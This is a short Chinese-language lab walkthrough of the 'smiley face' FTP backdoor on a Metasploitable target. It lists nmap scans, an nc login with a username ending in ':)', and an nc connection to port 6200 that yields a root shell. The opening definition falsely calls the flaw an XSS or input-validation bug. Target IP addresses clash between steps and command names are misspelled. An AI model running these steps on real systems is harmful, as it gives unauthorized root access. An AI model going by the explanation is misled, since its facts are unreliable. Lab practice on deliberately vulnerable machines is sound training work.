笑脸漏洞
笑脸漏洞
moxuun微笑漏洞
微笑漏洞(Smile Vulnerability)是一种安全漏洞,通常涉及Web应用程序的输入验证不足,导致攻击者能够通过特殊输入(例如恶意脚本)绕过安全措施,进行跨站脚本攻击(XSS)或其他类型的攻击。该漏洞可能出现在未对用户输入进行适当过滤或转义的情况下。在检测到用户名带有特殊字符:)时,会自动打开6200端口。
微笑漏洞的实现
工具
metasploitable,kali
实现
使用到的命令
ifconfig–获得本机ip,网段
nmap 192.168.111.0/24– 查看192.168.111.0的网段下所有ip,得到靶机的ip
nmap -sV +靶机ip – 查看靶机的端口服务
nc 靶机ip 端口–链接目标靶机与端口
nmap -p 端口 ip 查看特定ip的端口是否开放
使用Nmap扫描同网段下的主机,得到靶机ip。
ipconfig
namp 192.168.111.0/24
使用 namp -sV 靶机ip 查看靶机开放端口
使用 nc 192.168.111.1 21连接靶机21端口
输入user 123:) pass 随意密码
使用 namp -p 6200 192.168.116.130 查看6200端口是否打开,如图已经打开
使用 nc 192.168.111.1 6200 连接6200端口
输入 whoami ,显示root,输入ls,显示列表,则表示成功。
[up主专用,视频内嵌代码贴在这]
